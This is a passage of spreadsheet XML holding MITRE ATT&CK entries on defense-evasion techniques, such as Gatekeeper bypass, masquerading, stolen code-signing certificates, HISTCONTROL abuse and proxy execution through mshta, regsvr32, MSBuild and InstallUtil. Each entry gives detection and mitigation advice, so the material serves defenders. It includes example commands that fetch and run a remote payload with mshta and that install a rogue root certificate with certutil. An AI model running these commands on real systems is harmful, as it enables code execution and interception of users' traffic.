In typical operation, a file will be downloaded from the internet and given a quarantine flag before being saved to disk. When the user tries to open the file or application, macOS?s gatekeeper will step in and check for the presence of this flag. If it exists, then macOS will then prompt the user to confirmation that they want to run the program and will even provide the URL where the application came from. However, this is all based on the file being downloaded from a quarantine-savvy application.[[CiteRef::Bypassing Gatekeeper]]</t>
  </si>
  <si>
    <t>Application whitelisting,Anti-virus</t>
  </si>
  <si>
    <t>Monitoring for the removal of the &lt;code&gt;com.apple.quarantine&lt;/code&gt; flag by a user instead of the operating system is a suspicious action and should be examined further. ,</t>
  </si>
  <si>
    <t>Other tools should be used to supplement Gatekeeper's functionality. Additionally, system settings can prevent applications from running that haven't been downloaded through the Apple Store which can help mitigate some of these issues.</t>
  </si>
  <si>
    <t>User,Administrator</t>
  </si>
  <si>
    <t>https://attack.mitre.org/wiki/Technique/T1144</t>
  </si>
  <si>
    <t>Some data in [[Software/S0125|Remsec]] is encrypted using RC5 in CBC mode, AES-CBC with a hardcoded key, RC4, or Salsa20. Some data is also base64-encoded.[[CiteRef::Symantec Remsec IOCs]][[CiteRef::Kaspersky ProjectSauron Technical Analysis]]</t>
  </si>
  <si>
    <t>[[Software/S0148|RTM]] strings, network data, configuration, and modules are encrypted with a modified RC4 algorithm.[[CiteRef::ESET RTM Feb 2017]]</t>
  </si>
  <si>
    <t>Droppers used by [[Group/G0024|Putter Panda]] use RC4 or a 16-byte XOR key consisting of the bytes 0xA0 ? 0xAF to obfuscate payloads.[[CiteRef::CrowdStrike Putter Panda]]</t>
  </si>
  <si>
    <t>Network Share Connection Removal</t>
  </si>
  <si>
    <t>Windows shared drive and [[Technique/T1077|Windows Admin Shares]] connections can be removed when no longer needed. [[Software/S0039|Net]] is an example utility that can be used to remove network share connections with the &lt;code&gt;net use \\system\share /delete&lt;/code&gt; command.[[CiteRef::Technet Net Use]]
Adversaries may remove share connections that are no longer useful in order to clean up traces of their operation.</t>
  </si>
  <si>
    <t>Process monitoring,Process command-line parameters,Packet capture,Authentication logs</t>
  </si>
  <si>
    <t>Network share connections may be common depending on how an network environment is used. Monitor command-line invocation of &lt;code&gt;net use&lt;/code&gt; commands associated with establishing and removing remote shares over SMB, including following best practices for detection of [[Technique/T1077|Windows Admin Shares]]. SMB traffic between systems may also be captured and decoded to look for related network share session and file transfer activity. Windows authentication logs are also useful in determining when authenticated network shares are established and by which account, and can be used to correlate network share activity to other events to investigate potentially malicious activity. ,</t>
  </si>
  <si>
    <t>Follow best practices for mitigation of activity related to establishing [[Technique/T1077|Windows Admin Shares]]. 
Identify unnecessary system utilities or potentially malicious software that may be used to leverage network shares, and audit and/or block them by using whitelisting[[CiteRef::Beechey 2010]] tools, like AppLocker,[[CiteRef::Windows Commands JPCERT]][[CiteRef::NSA MS AppLocker]] or Software Restriction Policies[[CiteRef::Corio 2008]] where appropriate.[[CiteRef::TechNet Applocker vs SRP]]</t>
  </si>
  <si>
    <t>Established network share connection to a remote system. Level of access depends on permissions of the account used.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/wiki/Technique/T1126</t>
  </si>
  <si>
    <t>[[Software/S0168|Gazer]] logs its actions into files that are encrypted with 3DES. The malware also stores configuration items in alternate data streams if the Registry is not accessible.[[CiteRef::ESET Gazer Aug 2017]] It also uses RSA to encrypt resources.[[CiteRef::Securelist WhiteBear Aug 2017]]</t>
  </si>
  <si>
    <t>[[Software/S0070|HTTPBrowser]]'s code may be obfuscated through structured exception handling and return-oriented programming.[[CiteRef::Dell TG-3390]]</t>
  </si>
  <si>
    <t>named its tools to masquerade as Windows or Adobe Reader software, such as by using the file name adobecms.exe and the directory &lt;code&gt;CSIDL_APPDATA\microsoft\security&lt;/code&gt;.[[CiteRef::Symantec Sowbug Nov 2017]]</t>
  </si>
  <si>
    <t>The [[Software/S0125|Remsec]] loader implements itself with the name Security Support Provider, a legitimate Windows function. Various [[Software/S0125|Remsec]] .exe files mimic legitimate file names used by Microsoft, Symantec, Kaspersky, Hewlett-Packard, and VMWare.[[CiteRef::Symantec Remsec IOCs]][[CiteRef::Kaspersky ProjectSauron Full Report]] [[Software/S0125|Remsec]] also disguised malicious modules using similar filenames as custom network encryption software on victims.[[CiteRef::Kaspersky ProjectSauron Full Report]]</t>
  </si>
  <si>
    <t>[[Software/S0118|Nidiran]] can create a new service named msamger (Microsoft Security Accounts Manager), which mimics the legitimate Microsoft database by the same name.[[CiteRef::Symantec Backdoor.Nidiran]][[CiteRef::Microsoft SAM]]</t>
  </si>
  <si>
    <t>PROMETHIUM</t>
  </si>
  <si>
    <t>PROMETHIUM ,</t>
  </si>
  <si>
    <t>G0056</t>
  </si>
  <si>
    <t>Software: Truvasys</t>
  </si>
  <si>
    <t>To establish persistence,  adds a Registry Run key with a value "TaskMgr" in an attempt to masquerade as the legitimate Windows Task Manager.[[CiteRef::Microsoft Win Defender Truvasys Sep 2017]]</t>
  </si>
  <si>
    <t>has masqueraded as legitimate Adobe Content Management System files.[[CiteRef::Forcepoint Felismus Mar 2017]]</t>
  </si>
  <si>
    <t>has masqueraded as legitimate software update packages such as Adobe Acrobat Reader and Intel.[[CiteRef::Symantec Sowbug Nov 2017]]</t>
  </si>
  <si>
    <t>Software: Winnti</t>
  </si>
  <si>
    <t>A [[Software/S0141|Winnti]] implant file was named ASPNET_FILTER.DLL, mimicking the legitimate ASP.NET ISAPI filter DLL with the same name.[[CiteRef::Microsoft Winnti Jan 2017]]</t>
  </si>
  <si>
    <t>LC_MAIN Hijacking</t>
  </si>
  <si>
    <t>As of OS X 10.8, mach-O binaries introduced a new header called LC_MAIN that points to the binary?s entry point for execution. Previously, there were two headers to achieve this same effect: LC_THREAD and LC_UNIXTHREAD [[CiteRef::Prolific OSX Malware History]]. The entry point for a binary can be hijacked so that initial execution flows to a malicious addition (either another section or a code cave) and then goes back to the initial entry point so that the victim doesn?t know anything was different [[CiteRef::Methods of Mac Malware Persistence]]. By modifying a binary in this way, application whitelisting can be bypassed because the file name or application path is still the same.</t>
  </si>
  <si>
    <t>Binary file metadata,Malware reverse engineering,Process Monitoring</t>
  </si>
  <si>
    <t>Application whitelisting,Process whitelisting,Whitelisting by file name or path</t>
  </si>
  <si>
    <t>Determining the original entry point for a binary is difficult, but checksum and signature verification is very possible. Modifying the LC_MAIN entry point or adding in an additional LC_MAIN entry point invalidates the signature for the file and can be detected. Collect running process information and compare against known applications to look for suspicious behavior. ,</t>
  </si>
  <si>
    <t>Enforce valid digital signatures for signed code on all applications and only trust applications with signatures from trusted parties.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/wiki/Technique/T1149</t>
  </si>
  <si>
    <t>HISTCONTROL</t>
  </si>
  <si>
    <t>The &lt;code&gt;HISTCONTROL&lt;/code&gt; environment variable keeps track of what should be saved by the &lt;code&gt;history&lt;/code&gt; command and eventually into the &lt;code&gt;~/.bash_history&lt;/code&gt; file when a user logs out. This setting can be configured to ignore commands that start with a space by simply setting it to "ignorespace". &lt;code&gt;HISTCONTROL&lt;/code&gt; can also be set to ignore duplicate commands by setting it to "ignoredups". In some Linux systems, this is set by default to "ignoreboth" which covers both of the previous examples. This means that ? ls? will not be saved, but ?ls? would be saved by history. &lt;code&gt;HISTCONTROL&lt;/code&gt; does not exist by default on macOS, but can be set by the user and will be respected. Adversaries can use this to operate without leaving traces by simply prepending a space to all of their terminal commands.</t>
  </si>
  <si>
    <t>Process Monitoring,Authentication logs,File monitoring,Environment variable</t>
  </si>
  <si>
    <t>Correlating a user session with a distinct lack of new commands in their &lt;code&gt;.bash_history&lt;/code&gt; can be a clue to suspicious behavior. Additionally, users checking or changing their &lt;code&gt;HISTCONTROL&lt;/code&gt; environment variable is also suspicious. ,</t>
  </si>
  <si>
    <t>Prevent users from changing the &lt;code&gt;HISTCONTROL&lt;/code&gt; environment variable[[CiteRef::Securing bash history]]. Also, make sure that the &lt;code&gt;HISTCONTROL&lt;/code&gt; environment variable is set to ?ignoredup? instead of ?ignoreboth? or ?ignorespace?.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/wiki/Technique/T1148</t>
  </si>
  <si>
    <t>[[Software/S0072|OwaAuth]] uses the filename owaauth.dll, which is a legitimate file that normally resides in &lt;code&gt;%ProgramFiles%\Microsoft\Exchange Server\ClientAccess\Owa\Auth\&lt;/code&gt;; the malicious file by the same name is saved in &lt;code&gt;%ProgramFiles%\Microsoft\Exchange Server\ClientAccess\Owa\bin\&lt;/code&gt;.[[CiteRef::Dell TG-3390]]</t>
  </si>
  <si>
    <t>[[Group/G0052|CopyKittens]] digitally signed an executable with a stolen certificate from legitimate company AI Squared.[[CiteRef::ClearSky Wilted Tulip July 2017]]</t>
  </si>
  <si>
    <t>Many strings in [[Software/S0044|JHUHUGIT]] are obfuscated with a XOR algorithm.[[CiteRef::F-Secure Sofacy 2015]][[CiteRef::ESET Sednit Part 1]]</t>
  </si>
  <si>
    <t>[[Group/G0012|Darkhotel]] has used code-signing certificates on its malware that are either forged due to weak keys or stolen.[[CiteRef::Kaspersky Darkhotel]]</t>
  </si>
  <si>
    <t>[[Group/G0021|Molerats]] has used forged Microsoft code-signing certificates on malware.[[CiteRef::FireEye Operation Molerats]]</t>
  </si>
  <si>
    <t>[[Software/S0144|ChChes]] samples were digitally signed with a certificate originally used by Hacking Team that was later leaked and subsequently revoked.[[CiteRef::Palo Alto menuPass Feb 2017]][[CiteRef::JPCERT ChChes Feb 2017]][[CiteRef::PWC Cloud Hopper Technical Annex April 2017]]</t>
  </si>
  <si>
    <t>[[Group/G0007|APT28]] encrypted a .dll payload using RTL and a custom encryption algorithm.[[CiteRef::Bitdefender APT28 Dec 2015]]</t>
  </si>
  <si>
    <t>Most of the strings in [[Software/S0045|ADVSTORESHELL]] are encrypted with an XOR-based algorithm; some strings are also encrypted with 3DES and reversed. API function names are also reversed, presumably to avoid detection in memory.[[CiteRef::Kaspersky Sofacy]][[CiteRef::Bitdefender APT28 Dec 2015]]</t>
  </si>
  <si>
    <t>[[Software/S0137|CORESHELL]] obfuscates strings using a custom stream cipher.[[CiteRef::FireEye APT28]]</t>
  </si>
  <si>
    <t>[[Software/S0138|OLDBAIT]] obfuscates internal strings and unpacks them at startup.[[CiteRef::FireEye APT28]]</t>
  </si>
  <si>
    <t>Most strings in [[Software/S0136|USBStealer]] are encrypted using 3DES and XOR and reversed.[[CiteRef::ESET Sednit USBStealer 2014]]</t>
  </si>
  <si>
    <t>[[Software/S0170|Helminth]] samples have been signed with legitimate, compromised code signing certificates owned by software company AI Squared.[[CiteRef::ClearSky OilRig Jan 2017]]</t>
  </si>
  <si>
    <t>[[Software/S0139|PowerDuke]] uses an alternate data stream (ADS) PNG file to hide and encrypt itself using Tiny Encryption Algorithm (TEA).[[CiteRef::Volexity PowerDuke November 2016]]</t>
  </si>
  <si>
    <t>[[Software/S0150|POSHSPY]] appends a file signature header (randomly selected from six file types) to encrypted data prior to upload or download.[[CiteRef::FireEye POSHSPY April 2017]]</t>
  </si>
  <si>
    <t>The payload of [[Software/S0046|CozyCar]] is encrypted with simple XOR with a rotating key. The [[Software/S0046|CozyCar]] configuration file has been encrypted with RC4 keys.[[CiteRef::F-Secure CozyDuke]]</t>
  </si>
  <si>
    <t>[[Group/G0022|APT3]] obfuscates files or information to help evade defensive measures. [[CiteRef::Symantec Buckeye]]</t>
  </si>
  <si>
    <t>Software: SHOTPUT, Backdoor.APT.CookieCutter, Pirpi</t>
  </si>
  <si>
    <t>[[Software/S0063|SHOTPUT]] is obscured using XOR encoding and appended to a valid GIF file.[[CiteRef::FireEye Clandestine Wolf]][[CiteRef::Palo Alto CVE-2015-3113 July 2015]]</t>
  </si>
  <si>
    <t>A version of [[Software/S0117|XTunnel]] introduced in July 2015 obfuscated the binary using opaque predicates and other techniques in a likely attempt to obfuscate it and bypass security products.[[CiteRef::ESET Sednit Part 2]]</t>
  </si>
  <si>
    <t>[[Group/G0039|Suckfly]] has used stolen certificates to sign its malware.[[CiteRef::Symantec Suckfly March 2016]]</t>
  </si>
  <si>
    <t>[[Software/S0148|RTM]] samples have been signed with a code-signing certificates.[[CiteRef::ESET RTM Feb 2017]]</t>
  </si>
  <si>
    <t>[[Software/S0168|Gazer]] versions are signed with various valid certificates; one was likely faked and issued by Comodo for "Solid Loop Ltd," and another was issued for "Ultimate Computer Support Ltd."[[CiteRef::ESET Gazer Aug 2017]][[CiteRef::Securelist WhiteBear Aug 2017]]</t>
  </si>
  <si>
    <t>[[Group/G0044|Winnti Group]] used stolen certificates to sign its malware.[[CiteRef::Kaspersky Winnti April 2013]]</t>
  </si>
  <si>
    <t>[[Group/G0010|Turla]] has used valid digital certificates from Sysprint AG to sign its [[Software/S0091|Epic]] dropper.[[CiteRef::Kaspersky Turla]]</t>
  </si>
  <si>
    <t>Threat Group-1314</t>
  </si>
  <si>
    <t>Threat Group-1314 TG-1314 ,</t>
  </si>
  <si>
    <t>G0028</t>
  </si>
  <si>
    <t>Software: Net, net.exe</t>
  </si>
  <si>
    <t>The &lt;code&gt;net use \\system\share /delete&lt;/code&gt; command can be used in [[Software/S0039|Net]] to remove an established connection to a network share.[[CiteRef::Technet Net Use]]</t>
  </si>
  <si>
    <t>[[Group/G0027|Threat Group-3390]] has detached network shares after exfiltrating files, likely to evade detection.[[CiteRef::SecureWorks BRONZE UNION June 2017]]</t>
  </si>
  <si>
    <t>[[Software/S0160|certutil]] can be used to install browser root certificates as a precursor to performing man-in-the-middle between connections to banking websites. Example command: &lt;code&gt;certutil -addstore -f -user ROOT ProgramData\cert512121.der&lt;/code&gt;.[[CiteRef::Palo Alto Retefe]]</t>
  </si>
  <si>
    <t>[[Software/S0124|Pisloader]] obfuscates files by splitting strings into smaller sub-strings and including "garbage" strings that are never used. The malware also uses return-oriented programming (ROP) technique and single-byte XOR to obfuscate data.[[CiteRef::Palo Alto DNS Requests]]</t>
  </si>
  <si>
    <t>[[Software/S0148|RTM]] can add a certificate to the Windows store.[[CiteRef::ESET RTM Feb 2017]]</t>
  </si>
  <si>
    <t>Defense Evasion,Execution</t>
  </si>
  <si>
    <t>Trusted Developer Utilities</t>
  </si>
  <si>
    <t>A version of [[Software/S0013|PlugX]] loads as shellcode within a .NET Framework project using msbuild.exe, presumably to bypass application whitelisting techniques.[[CiteRef::Palo Alto PlugX June 2017]]</t>
  </si>
  <si>
    <t>Process monitoring</t>
  </si>
  <si>
    <t>Application whitelisting</t>
  </si>
  <si>
    <t>The presence of these or other utilities that enable proxy execution that are typically used for development, debugging, and reverse engineering on a system that is not used for these purposes may be suspicious.
Use process monitoring to monitor the execution and arguments of MSBuild.exe, dnx.exe, rcsi.exe, WinDbg.exe, cdb.exe, and tracker.exe. Compare recent invocations of those binaries with prior history of known good arguments and executed binaries to determine anomalous and potentially adversarial activity. It is likely that these utilities will be used by software developers or for other software development related tasks, so if it exists and is used outside of that context, then the event may be suspicious. Command arguments used before and after invocation of the utilities may also be useful in determining the origin and purpose of the binary being executed. ,</t>
  </si>
  <si>
    <t>MSBuild.exe, dnx.exe, rcsi.exe, WinDbg.exe, cdb.exe, and tracker.exe may not be necessary within a given environment and should be removed if not used.
Use application whitelisting configured to block execution of MSBuild.exe, dnx.exe, rcsi.exe, WinDbg.exe, and cdb.exe if they are not required for a given system or network to prevent potential misuse by adversaries.[[CiteRef::Microsoft GitHub Device Guard CI Policies]][[CiteRef::Exploit Monday Mitigate Device Guard Bypases]][[CiteRef::GitHub mattifestation DeviceGuardBypass]][[CiteRef::SubTee MSBuild]]</t>
  </si>
  <si>
    <t>MSBuild: .NET Framework version 4 or higher
DNX: .NET 4.5.2, Powershell 4.0
RCSI: .NET 4.5 or later, Visual Studio 2012</t>
  </si>
  <si>
    <t>Casey Smith,Matthew Demaske, Adaptforward</t>
  </si>
  <si>
    <t>https://attack.mitre.org/wiki/Technique/T1127</t>
  </si>
  <si>
    <t>Scripting</t>
  </si>
  <si>
    <t>Adversaries may use scripts to aid in operations and perform multiple actions that would otherwise be manual. Scripting is useful for speeding up operational tasks and reducing the time required to gain access to critical resources. Some scripting languages may be used to bypass process monitoring mechanisms by directly interacting with the operating system at an API level instead of calling other programs. Common scripting languages for Windows include VBScript and PowerShell but could also be in the form of command-line batch scripts.
Many popular offensive frameworks exist which use forms of scripting for security testers and adversaries alike. Metasploit[[CiteRef::Metasploit]], Veil[[CiteRef::Veil]], and PowerSploit[[CiteRef::Powersploit]] are three examples that are popular among penetration testers for exploit and post-compromise operations and include many features for evading defenses. Some adversaries are known to use PowerShell.[[CiteRef::Alperovitch 2014]]</t>
  </si>
  <si>
    <t>Process monitoring,File monitoring,Process command-line parameters</t>
  </si>
  <si>
    <t>Process whitelisting</t>
  </si>
  <si>
    <t>Scripting may be common on admin, developer, or power user systems, depending on job function. If scripting is restricted for normal users, then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Scripts are likely to perform actions with various effects on a system that may generate events, depending on the types of monitoring used. Monitor processes and command-line arguments for script execution and subsequent behavior. Actions may be related to network and system information [[Discovery]], [[Collection]], or other scriptable post-compromise behaviors and could be used as indicators of detection leading back to the source script. ,</t>
  </si>
  <si>
    <t>Turn off unused features or restrict access to scripting engines such as VBScript or scriptable administration frameworks such as PowerShell.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/wiki/Technique/T1064</t>
  </si>
  <si>
    <t>One version of [[Software/S0170|Helminth]] consists of VBScript and PowerShell scripts. The malware also uses batch scripting.[[CiteRef::Palo Alto OilRig May 2016]]</t>
  </si>
  <si>
    <t>[[Group/G0038|Stealth Falcon]] malware uses PowerShell and WMI to script data collection and command execution on the victim.[[CiteRef::Citizen Lab Stealth Falcon May 2016]]</t>
  </si>
  <si>
    <t>[[Group/G0059|Magic Hound]] malware has used .vbs scripts for execution.[[CiteRef::Unit 42 Magic Hound Feb 2017]]</t>
  </si>
  <si>
    <t>[[Group/G0049|OilRig]] has used various types of scripting for execution, including.[[CiteRef::OilRig ISMAgent July 2017]]</t>
  </si>
  <si>
    <t>Space after Filename</t>
  </si>
  <si>
    <t>Adversaries can hide a program's true filetype by changing the extension of a file. With certain file types (specifically this does not work with .app extensions), appending a space to the end of a filename will change how the file is processed by the operating system. For example, if there is a Mach-O executable file called evil.bin, when it is double clicked by a user, it will launch Terminal.app and execute. If this file is renamed to evil.txt, then when double clicked by a user, it will launch with the default text editing application (not executing the binary). However, if the file is renamed to "evil.txt " (note the space at the end), then when double clicked by a user, the true file type is determined by the OS and handled appropriately and the binary will be executed[[CiteRef::Mac Backdoors are back]]. 
Adversaries can use this feature to trick users into double clicking benign-looking files of any format and ultimately executing something malicious.</t>
  </si>
  <si>
    <t>File monitoring,Process Monitoring</t>
  </si>
  <si>
    <t>It's not common for spaces to be at the end of filenames, so this is something that can easily be checked with file monitoring. From the user's perspective though, this is very hard to notice from within the Finder.app or on the command-line in Terminal.app. Processes executed from binaries containing non-standard extensions in the filename are suspicious. ,</t>
  </si>
  <si>
    <t>Prevent files from having a trailing space after the extension.</t>
  </si>
  <si>
    <t>Erye Hernandez, Palo Alto Networks</t>
  </si>
  <si>
    <t>https://attack.mitre.org/wiki/Technique/T1151</t>
  </si>
  <si>
    <t>Mshta</t>
  </si>
  <si>
    <t>Mshta.exe is a utility that executes Microsoft HTML Applications (HTA). HTA files have the file extension &lt;code&gt;.hta&lt;/code&gt;.[[CiteRef::Wikipedia HTML Application]] HTAs are standalone applications that execute using the same models and technologies of Internet Explorer, but outside of the browser.[[CiteRef::MSDN HTML Applications]]
Adversaries can use mshta.exe to proxy execution of malicious .hta files and Javascript or VBScript through a trusted Windows utility. There are several examples of different types of threats leveraging mshta.exe during initial compromise and for execution of code[[CiteRef::Cylance Dust Storm]][[CiteRef::Red Canary HTA Abuse Part Deux]][[CiteRef::FireEye Attacks Leveraging HTA]][[CiteRef::Airbus Security Kovter Analysis]][[CiteRef::FireEye FIN7 April 2017]] 
Files may be executed by mshta.exe through an inline script: &lt;code&gt;mshta vbscript:Close(Execute("GetObject(""script:https[:]//webserver/payload[.]sct"")"))&lt;/code&gt;
They may also be executed directly from URLs: &lt;code&gt;mshta http[:]//webserver/payload[.]hta&lt;/code&gt;
Mshta.exe can be used to bypass application whitelisting solutions that do not account for its potential use. Since mshta.exe executes outside of the Internet Explorer's security context, it also bypasses browser security settings.[[CiteRef::GitHub SubTee The List]]</t>
  </si>
  <si>
    <t>Process monitoring,Process command-line parameters</t>
  </si>
  <si>
    <t>Use process monitoring to monitor the execution and arguments of mshta.exe. Look for mshta.exe executing raw or obfuscated script within the command-line. Compare recent invocations of mshta.exe with prior history of known good arguments and executed binaries to determine anomalous and potentially adversarial activity. Command arguments used before and after the mshta.exe invocation may also be useful in determining the origin and purpose of the binary being executed.
Monitor use of HTA files. If they are not typically used within an environment then execution of them may be suspicious. ,</t>
  </si>
  <si>
    <t>Mshta.exe may not be necessary within a given environment since its functionality is tied to older versions of Internet Explorer which have reached end of life. Use application whitelisting configured to block execution of mshta.exe if it is not required for a given system or network to prevent potential misuse by adversaries.</t>
  </si>
  <si>
    <t>Ricardo Dias,Ye Yint Min Thu Htut, @yeyint_mth</t>
  </si>
  <si>
    <t>https://attack.mitre.org/wiki/Technique/T1170</t>
  </si>
  <si>
    <t>There are many utilities used for software development related tasks that can be used to execute code in various forms to assist in development, debugging, and reverse engineering. These utilities may often be signed with legitimate certificates that allow them to execute on a system and proxy execution of malicious code through a trusted process that effectively bypasses application whitelisting defensive solutions.
===MSBuild===
MSBuild.exe (Microsoft Build Engine) is a software build platform used by Visual Studio. It takes XML formatted project files that define requirements for building various platforms and configurations.[[CiteRef::MSDN MSBuild]] 
Adversaries can use MSBuild to proxy execution of code through a trusted Windows utility. The inline task capability of MSBuild that was introduced in .NET version 4 allows for C# code to be inserted into the XML project file.[[CiteRef::MSDN MSBuild Inline Tasks]] MSBuild will compile and execute the inline task. MSBuild.exe is a signed Microsoft binary, so when it is used this way it can execute arbitrary code and bypass application whitelisting defenses that are configured to allow MSBuild.exe execution.[[CiteRef::SubTee GitHub All The Things Application Whitelisting Bypass]]
===DNX===
The .NET Execution Environment (DNX), dnx.exe, is a software development kit packaged with Visual Studio Enterprise. It was retired in favor of .NET Core CLI in 2016.[[CiteRef::Microsoft Migrating from DNX]] DNX is not present on standard builds of Windows and may only be present on developer workstations using older versions of .NET Core and ASP.NET Core 1.0. The dnx.exe executable is signed by Microsoft. 
An adversary can use dnx.exe to proxy execution of arbitrary code to bypass application whitelist policies that do not account for DNX.[[CiteRef::engima0x3 DNX Bypass]]
===RCSI===
The rcsi.exe utility is a non-interactive command-line interface for C# that is similar to csi.exe. It was provided within an early version of the Roslyn .NET Compiler Platform but has since been deprecated for an integrated solution.[[CiteRef::Microsoft Roslyn CPT RCSI]] The rcsi.exe binary is signed by Microsoft.[[CiteRef::engima0x3 RCSI Bypass]]
C# .csx script files can be written and executed with rcsi.exe at the command-line. An adversary can use rcsi.exe to proxy execution of arbitrary code to bypass application whitelisting policies that do not account for execution of rcsi.exe.[[CiteRef::engima0x3 RCSI Bypass]]
===WinDbg/CDB===
WinDbg is a Microsoft Windows kernel and user-mode debugging utility. The Microsoft Console Debugger (CDB) cdb.exe is also user-mode debugger. Both utilities are included in Windows software development kits and can be used as standalone tools.[[CiteRef::Microsoft Debugging Tools for Windows]] They are commonly used in software development and reverse engineering and may not be found on typical Windows systems. Both WinDbg.exe and cdb.exe binaries are signed by Microsoft.
An adversary can use WinDbg.exe and cdb.exe to proxy execution of arbitrary code to bypass application whitelist policies that do not account for execution of those utilities.[[CiteRef::Exploit Monday WinDbg]]
It is likely possible to use other debuggers for similar purposes, such as the kernel-mode debugger kd.exe, which is also signed by Microsoft.
===Tracker===
The file tracker utility, tracker.exe, is included with the .NET framework as part of MSBuild. It is used for logging calls to the Windows file system.[[CiteRef::Microsoft Docs File Tracking]]
An adversary can use tracker.exe to proxy execution of an arbitrary DLL into another process. Since tracker.exe is also signed it can be used to bypass application whitelisting solutions.[[CiteRef::Twitter SubTee Tracker.exe]]</t>
  </si>
  <si>
    <t>Rundll32</t>
  </si>
  <si>
    <t>The rundll32.exe program can be called to execute an arbitrary binary. Adversaries may take advantage of this functionality to proxy execution of code to avoid triggering security tools that may not monitor execution of the rundll32.exe process because of whitelists or false positives from Windows using rundll32.exe for normal operations.
Rundll32.exe can also be used to execute Control Panel Item files (.cpl) through the undocumented shell32.dll functions &lt;code&gt;Control_RunDLL&lt;/code&gt; and &lt;code&gt;Control_RunDLLAsUser&lt;/code&gt;. Double-clicking a .cpl file also causes rundll32.exe to execute.[[CiteRef::Trend Micro CPL]]</t>
  </si>
  <si>
    <t>File monitoring,Binary file metadata,Process command-line parameters,Process monitoring</t>
  </si>
  <si>
    <t>Anti-virus,Application whitelisting</t>
  </si>
  <si>
    <t>Use process monitoring to monitor the execution and arguments of rundll32.exe. Compare recent invocations of rundll32.exe with prior history of known good arguments and loaded DLLs to determine anomalous and potentially adversarial activity. Command arguments used with the rundll32.exe invocation may also be useful in determining the origin and purpose of the DLL being loaded. ,</t>
  </si>
  <si>
    <t>Microsoft's Enhanced Mitigation Experience Toolkit (EMET) Attack Surface Reduction (ASR) feature can be used to block methods of using rundll32.exe to bypass whitelisting.[[CiteRef::Secure Host Baseline EMET]]</t>
  </si>
  <si>
    <t>Ricardo Dias</t>
  </si>
  <si>
    <t>https://attack.mitre.org/wiki/Technique/T1085</t>
  </si>
  <si>
    <t>Regsvr32</t>
  </si>
  <si>
    <t>Regsvr32.exe is a command-line program used to register and unregister object linking and embedding controls, including dynamic link libraries (DLLs), on Windows systems. Regsvr32.exe can be used to execute arbitrary binaries.[[CiteRef::Microsoft Regsvr32]]
Adversaries may take advantage of this functionality to proxy execution of code to avoid triggering security tools that may not monitor execution of, and modules loaded by, the regsvr32.exe process because of whitelists or false positives from Windows using regsvr32.exe for normal operations. Regsvr32.exe is also a Microsoft signed binary.
Regsvr32.exe can also be used to specifically bypass process whitelisting using functionality to load COM scriptlets to execute DLLs under user permissions. Since regsvr32.exe is network and proxy aware, the scripts can be loaded by passing a uniform resource locator (URL) to file on an external Web server as an argument during invocation. This method makes no changes to the Registry as the COM object is not actually registered, only executed.[[CiteRef::SubTee Regsvr32 Whitelisting Bypass]] This variation of the technique has been used in campaigns targeting governments.[[CiteRef::FireEye Regsvr32 Targeting Mongolian Gov]]</t>
  </si>
  <si>
    <t>Loaded DLLs,Process monitoring,Process command-line parameters,Windows Registry</t>
  </si>
  <si>
    <t>Process whitelisting,Anti-virus</t>
  </si>
  <si>
    <t>Use process monitoring to monitor the execution and arguments of regsvr32.exe. Compare recent invocations of regsvr32.exe with prior history of known good arguments and loaded files to determine anomalous and potentially adversarial activity. Command arguments used before and after the regsvr32.exe invocation may also be useful in determining the origin and purpose of the script or DLL being loaded. ,</t>
  </si>
  <si>
    <t>Microsoft's Enhanced Mitigation Experience Toolkit (EMET) Attack Surface Reduction (ASR) feature can be used to block regsvr32.exe from being used to bypass whitelisting.[[CiteRef::Secure Host Baseline EMET]]</t>
  </si>
  <si>
    <t>Casey Smith</t>
  </si>
  <si>
    <t>https://attack.mitre.org/wiki/Technique/T1117</t>
  </si>
  <si>
    <t>Regsvcs/Regasm</t>
  </si>
  <si>
    <t>Regsvcs and Regasm are Windows command-line utilities that are used to register .NET Component Object Model (COM) assemblies. Both are digitally signed by Microsoft.[[CiteRef::MSDN Regsvcs]][[CiteRef::MSDN Regasm]]
Adversaries can use Regsvcs and Regasm to proxy execution of code through a trusted Windows utility. Both utilities may be used to bypass process whitelisting through use of attributes within the binary to specify code that should be run before registration or unregistration: &lt;code&gt;[ComRegisterFunction]&lt;/code&gt; or &lt;code&gt;[ComUnregisterFunction]&lt;/code&gt; respectively. The code with the registration and unregistration attributes will be executed even if the process is run under insufficient privileges and fails to execute.[[CiteRef::SubTee GitHub All The Things Application Whitelisting Bypass]]</t>
  </si>
  <si>
    <t>Use process monitoring to monitor the execution and arguments of Regsvcs.exe and Regasm.exe. Compare recent invocations of Regsvcs.exe and Regasm.exe with prior history of known good arguments and executed binaries to determine anomalous and potentially adversarial activity. Command arguments used before and after Regsvcs.exe or Regasm.exe invocation may also be useful in determining the origin and purpose of the binary being executed. ,</t>
  </si>
  <si>
    <t>Regsvcs and Regasm may not be necessary within a given environment. Block execution of Regsvcs.exe and Regasm.exe if they are not required for a given system or network to prevent potential misuess by adversaries.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/wiki/Technique/T1121</t>
  </si>
  <si>
    <t>InstallUtil</t>
  </si>
  <si>
    <t>InstallUtil is a command-line utility that allows for installation and uninstallation of resources by executing specific installer components specified in .NET binaries.[[CiteRef::MSDN InstallUtil]] InstallUtil is located in the .NET directories on a Windows system: &lt;code&gt;C:\Windows\Microsoft.NET\Framework\v&lt;version&gt;\InstallUtil.exe&lt;/code&gt; and &lt;code&gt;C:\Windows\Microsoft.NET\Framework64\v&lt;version&gt;\InstallUtil.exe&lt;/code&gt;. InstallUtil.exe is digitally signed by Microsoft.
Adversaries may use InstallUtil to proxy execution of code through a trusted Windows utility. InstallUtil may also be used to bypass process whitelisting through use of attributes within the binary that execute the class decorated with the attribute &lt;code&gt;[System.ComponentModel.RunInstaller(true)]&lt;/code&gt;.[[CiteRef::SubTee GitHub All The Things Application Whitelisting Bypass]]</t>
  </si>
  <si>
    <t>Use process monitoring to monitor the execution and arguments of InstallUtil.exe. Compare recent invocations of InstallUtil.exe with prior history of known good arguments and executed binaries to determine anomalous and potentially adversarial activity. Command arguments used before and after the InstallUtil.exe invocation may also be useful in determining the origin and purpose of the binary being executed. ,</t>
  </si>
  <si>
    <t>InstallUtil may not be necessary within a given environment. Use application whitelisting configured to block execution of InstallUtil.exe if it is not required for a given system or network to prevent potential misuse by adversaries.</t>
  </si>
  <si>
    <t>Casey Smith,Travis Smith, Tripwire</t>
  </si>
  <si>
